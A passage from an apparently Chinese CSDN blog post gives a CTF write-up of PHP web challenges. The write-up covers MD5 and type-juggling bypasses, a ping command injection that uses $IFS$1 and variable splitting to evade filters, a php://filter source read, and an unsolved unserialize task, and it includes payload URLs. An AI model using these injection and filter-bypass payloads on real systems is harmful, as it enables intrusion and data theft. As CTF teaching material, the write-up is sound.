2020-09-03签到赛

最新推荐文章于 2023-03-30 13:03:31 发布
最新推荐文章于 2023-03-30 13:03:31 发布
阅读量245 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kihyun_/article/details/108388009
版权

super_easy_web

<?php
highlight_file('index.php');
include('flag.php');
//try to reach the flag in variable
if(isset($_GET['a'])&&isset($_GET['b'])&&isset($_GET['c'])&&isset($_GET['d'])){
    if($_GET['a']!=$_GET['b']&&md5($_GET['a'])==md5($_GET['b'])){
        echo 'welcome to lv2';
        $c=$_GET['c'];
        $d=$_GET['d'];
        if($c==123456&&$c!==123456){
            echo $$d;
        }
    }
}

两层绕过,分别是md5绕过和弱类型绕过

第一层(md5绕过)

数组绕过:
a=1&b=[]=2

利用php中十六进制和科学计数法的漏洞
下列的字符串的MD5值都是0e开头的:
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a

第二层弱类型绕过
利用十六进制
在这里插入图片描述
将数字123456化成十六进制的字符串

最后构造的payload:

http://47.115.145.200:2031/index.php/?a=240610708&b=s878926199a&c=0x1e240&d=flag

1P1P

打开看见
在这里插入图片描述
想到强网杯那题,主动,想到命令注入
注入ls命令看目录
在这里插入图片描述
打开flag.php发现打不开
想到应该在mid.php找信息
cat mid.php
在这里插入图片描述
发现不能出现空格,要过滤

参考
大佬博客

在这里插入图片描述
用$IFS$1代替空格
得到

|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("no space!");
  } else if(preg_match("/bash/", $ip)){
    die("no your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("no your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print($a);
}

不能出现flag
用变量绕过

?ip=127.0.0.1; $ a=g;cat$IFS$1fla $ a.php(无空格)
要在F12看flag
在这里插入图片描述

依旧开心哈哈哈

在这里插入图片描述
想到文件包含
?content=php://filter/read=convert.base64-encode/resource=index.php
得到一串base64编码
解码后得到

<?php

error_reporting(0);
echo("You know include(\$content),right?");
echo("<br>");
echo("try '?content=/flag/flag.php'???nonono!not so easy!");
echo("<br>");
echo("try to view source of index first!");
echo("<br>");
echo("use php-filter! bro<br>");

//highlight_file(__FILE__);

if(isset($_GET['content']))
{
    $content = $_GET['content'];
    if($content=="index.php")die("There will be a bug,try another way~");

    if(substr($content,0,strlen("/flag/"))==="/flag/"||substr($content,0,strlen("flag/"))==="flag/"||substr($content,0,strlen("./flag/"))==="./flag/")
        die("hack me???");


    else
        include ($content);//flag in the /flag/flag.php
}
?>

然后又是不能出现【flag】,想了很久还是没想到,着实不知道

Very_Ez_Unserialize

在这里插入图片描述
没看懂这个hint?
打开看到的代码,是代码审计

<?php
show_source("index.php");
class A{
    public $a='0';
    public function __construct()
    {
        $this->a='';
    }
    public function __destruct()
    {
        echo $this->a.'';
    }
    public function sp(){
        return 'eagle 1, fox2';
    }
}

class B{
    public $b = '';
    public function __construct()
    {
        $this->b=new A;
    }
    public function __toString()
    {
        return $this->b->sp();
    }
}
class C{
    public $c='echo \'welcome\';';
    public function sp()
    {
       return eval($this->c);
    }

    public function getc($t){
        $this->c=$t;
    }
}

$s=unserialize($_GET['a']);

对反序列化完全没有头脑

Kihyun_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
第一次内部wp(write up)
qq_51954912的博客
03-21 260
第一次内部wp密码学webREmisc 密码学 古典密码 一道简单的密码学,看到属性中这个格式时,我就想到了凯撒密码,然后不知道偏移位数,我就一个个的试,最后得到flag **变形的猪圈密码 ** 在百度的过程中,对猪圈密码一顿了解,甚至还自己画了点猪圈密码,最后,在网上查到圣堂武士密码 就对比得到flag。 **ROT(不仅仅是base) ** 这道题舒适把我做吐了,我实在试了十来次真是。。。 最开始没有想到rot,就是base64和栅栏一顿操作,最后错多了,察觉不对劲,对rot百度了一首,然
CGCTF平台web题writeup
热门推荐
test
10-25 1万+
前言 正文 签到题 10pt tips : 这一定是最简单的 连接 恩,key在源代码中 md5 collision 20pt 连接 直接贴出了代码 $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' &amp;amp;amp;&amp;amp;amp; $md51 == $md5...
网络安全笔记-99-渗透-PHP代码注入
wwxxee
01-21 584
PHP代码注入 原理及成因 是指应用程序(web方面)过滤不严格,用户可以通过请求将代码注入到应用中执行。代码注入类似于SQL注入漏洞,SQLi是将SQL语句注入到数据库中,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接由一个web后门的存在。 漏洞危害 代码执行漏洞可以继承web用户权限,执行任意代码。如果服务器没有正确配置,web用户权限比较高,则可以读写目标服务器任意文件内容,甚至控制整个网站以及服务器。PHP中有很多函数和语句都会造成PHP代码执行漏
【Web-南邮CTF】Web-CTF入门第4天
ailx10
12-20 156
【黑客笔记--7天入门南邮CTF-WEB篇】/x00 需要我们提交GET请求 满足条件即可拿到flag ereg()函数用指定的模式搜索一个字符串中指定的字符串如果匹配成功返回true 否则 返回false正则表达式限制输入必须是数字开始结束strpos() 函数查找字符串在另一字符串中第一次出现的位置这个返回值False很灵性在自己的网站上写了一个测试代码 如下<?php $fla...
Android-Android自定义控件-签到日历
08-12
项目中用到的一个签到日历自定义控件,基于网络源码的部分修改而成,满足自己项目的需求了。
address(uni-app经纬度定位范围内签到)
06-24
address(uni-app经纬度定位范围内签到)
Python-v2ex定时自动签到脚本
08-10
v2ex 定时自动签到脚本
Fake-Check-in:假签到iOS
05-19
Fake Check-in功能单纯的Facebook应用app,可搜寻并在任何你想要的地标打卡,并且标记好友、上传照片等。纯属博君一笑,请勿用于不当用途!适用环境iPhone (iOS 8.0以上)操作截图使用资源 联络我Stephen Jiang ...
ios-打卡签到.zip
07-11
从点击开始 开始按钮变大到321go 圆逐渐变小 view CAGradientLayer渐变色设置 十六进制颜色转换 CABasicAnimation基础动画运用
web-PHP黑魔法&&我想要钱
song_10的博客
07-15 501
php黑魔法 这道题两个知识点: 备份文件;index.php~ php弱类型。 题目提示有源码,但点击进去后并未发现有用的源码: 查看备份文件:index.php~ 得到php源码: <!DOCTYPE html> <!--html lang="zh-CN"> <head> <meta http-equiv="Conten...
php get a get b,[CTF]CTF中if (md5(md5($_GET[‘a’])) == md5($_GET[‘b’])) 的绕过
weixin_42540248的博客
03-23 896
0X00 摘要CTF中md5判等可使用0e绕过,但是如果是双md5该如何绕过呢?本文将教你如何绕过md5(md5($_GET[‘a’])) == md5($_GET[b’])。0X01 引言在php中,所有变量都是若类型的,在使用if判等的时候要格外小心,使用特殊的参数可能会使本来不相等的if判断位相等,比如下面的例子。if (isset($_GET['a']) && isset(...
ctf题目: 前女友
qq_35191331的博客
08-13 2883
<?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){ if(!s
ctfshow web入门 PHP特性中篇(web105-web132)
ccfly1012的博客
09-11 1339
目录 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115 web123 web125 web126 web127 web128 web129 web130 web131 web132 web105 <?php ​ /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 1
ctfshow web入门 php特性
Sentiment的博客
04-11 5225
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
[CTF] 关于php代码审计的MD5类的练习
ZXW_NUDT的博客
12-03 2708
练习1 PHP代码: <?php error_reporting(0); highlight_file("pass-01.php"); if(isset($_GET["pass"])){ if($_GET["pass"] != hash("md4", $_GET["pass"])){ die('fail~~~'); }else{ echo "success!!!<br>";
BUUCTF-内联执行-变量拼接-base绕过-sql改||类型-*.1
m0_64180167的博客
03-30 220
第五周 3.30。
BUUCTF刷题----------[GXYCTF2019]Ping Ping Ping
qq_45616570的博客
03-10 194
BUUCTF刷题----------[GXYCTF2019]Ping Ping Ping 不定时更新 题目 考点 命令执行和过滤 解题思路 从题目可以看出需要执行?ip= 解题过程 构造payload http://053b3284-a6e4-4bbb-8c63-265b2267f9e2.node4.buuoj.cn:81/?ip=127.0.0.1 查看文件目录 http://053b3284-a6e4-4bbb-8c63-265b2267f9e2.node4.buuoj.cn:81/?ip=12
每周刷题(四)
qidiandexiaowu
10-11 403
目录0×00 web1 [极客大挑战 2019]LoveSQL0×01 web2 [RoarCTF 2019]Easy Calc 0×00 web1 [极客大挑战 2019]LoveSQL 又是一道注入题。 我竟然使用万能密码登录成功了。 给了一串字符但是不知道是啥用。 但换个思维来说,这可能是可回显注入。 payload:http://e1455b99-b85f-4948-8f64-0865420f5f19.node3.buuoj.cn/check.php?username=1'&passwo
Objective-c纯代码实现签到界面
最新发布
06-01
以下是Objective-C纯代码实现签到界面的示例代码: ```objective-c #import "CheckInViewController.h" @interface CheckInViewController () @property (nonatomic, strong) UILabel *titleLabel; @property (nonatomic, strong) UIButton *checkInButton; @end @implementation CheckInViewController - (void)viewDidLoad { [super viewDidLoad]; // 设置背景颜色 self.view.backgroundColor = [UIColor whiteColor]; // 添加标题 self.titleLabel = [[UILabel alloc] initWithFrame:CGRectMake(0, 100, self.view.frame.size.width, 30)]; self.titleLabel.text = @"今日签到"; self.titleLabel.textAlignment = NSTextAlignmentCenter; [self.view addSubview:self.titleLabel]; // 添加签到按钮 self.checkInButton = [[UIButton alloc] initWithFrame:CGRectMake(0, 0, 150, 50)]; self.checkInButton.center = self.view.center; [self.checkInButton setTitle:@"签到" forState:UIControlStateNormal]; [self.checkInButton setTitleColor:[UIColor whiteColor] forState:UIControlStateNormal]; [self.checkInButton setBackgroundColor:[UIColor blueColor]]; [self.checkInButton addTarget:self action:@selector(checkInButtonClicked) forControlEvents:UIControlEventTouchUpInside]; [self.view addSubview:self.checkInButton]; } - (void)checkInButtonClicked { // 处理签到逻辑 NSLog(@"签到成功!"); } @end ``` 这段代码中,我们创建了一个`CheckInViewController`类,其中包括`titleLabel`和`checkInButton`两个控件。在`viewDidLoad`方法中,我们设置了背景颜色,并添加了标题和签到按钮。当用户点击签到按钮时,我们在`checkInButtonClicked`方法中处理签到逻辑,并在控制台输出签到成功的日志。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值